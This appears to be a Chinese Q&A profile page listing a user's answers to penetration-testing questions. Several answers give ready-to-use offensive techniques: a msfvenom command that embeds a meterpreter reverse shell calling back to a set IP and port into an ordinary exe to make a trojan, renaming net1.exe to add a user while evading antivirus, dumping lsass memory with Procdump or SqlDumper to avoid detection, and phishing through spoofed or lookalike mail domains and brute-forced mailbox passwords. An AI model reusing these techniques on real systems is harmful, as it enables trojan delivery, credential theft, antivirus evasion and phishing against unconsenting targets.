210 个回答
在渗透过程中,收集目标站注册人邮箱有用吗?要怎么利用才能发挥...
1、钓鱼攻击,给这个邮箱发送钓鱼邮件2、社工库查询,反查常见密码3、qq、微博、支付宝、github,全面搜索,获取更多信息4、邮箱地址,对账号暴力破解,看是否可以猜解出密码
回答于 2022-09-02 16:13
token和referer做横向对比,谁安全等级高?
那肯定是:token安全等级更高。Referer可以伪造,并且并不是任何服务器都可以取得referer,如果从HTTPS跳到HTTP,也不会发送referer。并且FLASH一些版本中可以自定义referer。但是对于token的话,要保证其足够随机且不可泄露客户端建议存储到sessionstage里
回答于 2022-09-02 16:10
有没有小伙伴分享一下,你们都是怎么搞目标的
1、信息收集第一位:首先是目标全部的一级域名(往往不同业务对应不同的主域名),再根据不同的域名收集子域名,这样做的目的是尽可能的将目标扩大化。广撒网,好捕鱼2、对于收集来的域名,可以进行简单的扫描。如常见POC、文件泄露扫描、指纹识别。动作小,收货不一定小3、根据上面收集到的泄露的文件、常见的框架(spring...
回答于 2022-09-02 10:51
【网络安全一百问-99】提取内存hash时被查杀,如何绕过?
1、Procdump.exeProcdump是微软官方发布的工具,使用该工具可以把lsass的内存dump下来,可以绕过大多数的防护软件。2、SqlDumper.exeSqlDumper也属于微软出品,存在于SQL Server文件夹中,大多数杀软不会拦截。默认存放在C:\Program Files\Microsoft SQL Server\number\Shared,number代表SQL Server的版本。如果目标机器没...
回答于 2022-08-31 17:27
【网络安全一百问-98】如何把shellcode嵌入到正常exe中?
metasploit就可以msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.45.128 LPORT=4444 -x helloworld.exe -f exe -o trojan.exe就是使用的载荷(payload)为windows/meterpreter/reverse_tcp运行后回连192.168.45.128的4444端口,原程序为helloworld.exe,输出带有木马的程序,名称为trojan.exe。msf还可以生成ps...
回答于 2022-08-31 17:20
【网络安全一百问-97】Windows添加用户如何绕过火绒以及360?
copy c:\windows\system32\net1.exe aaa.txt aaa.txt user xxx 123456 /add
回答于 2022-08-31 11:35
【网络安全一百问-96】如何伪造钓鱼邮箱?会面临什么问题?
1、如果存在任意邮箱伪造漏洞,可伪造公司任意人员发送钓鱼邮件(难识别),比如利用SPF配置不合理来攻击2、通过爆破邮箱账号、口令或者通过社工库获取公司员工口令,发送钓鱼邮件3、通过注册相近的邮箱,如l和I、a和@、0和O等迷惑性域名,来进行钓鱼邮箱的制作
回答于 2022-08-31 11:32
【网络安全一百问-88】jsonp是什么?可以怎么利用?
1、JSONP全称是JSON with Padding ,是基于JSON格式的为解决跨域请求资源而产生的解决方案。他实现的基本原理是利用了 HTML 里 元素标签没有跨域限制2、常见的jsonp的漏洞有: jsonp劫持 利用JSONP绕过token防护进行csrf攻击 Callback可定义导致的的安全问题:如xss漏洞等
回答于 2022-08-31 10:02
【有奖话题讨论】《网络产品安全漏洞管理规定》施行一周年,对于...
1、任何个人、企业、机构和国家,都不能够利用网络产品安全漏洞,去做一些法律不允许的事情,若是被发现存在任何的违规行为,都将会受到法律的制裁。防止个人或机构获得数据信息,让用户群体放心2、规范漏洞上报和披露行为,防止突然发布0day灾难级漏洞,导致的严重的网络安全攻击
回答于 2022-08-31 09:54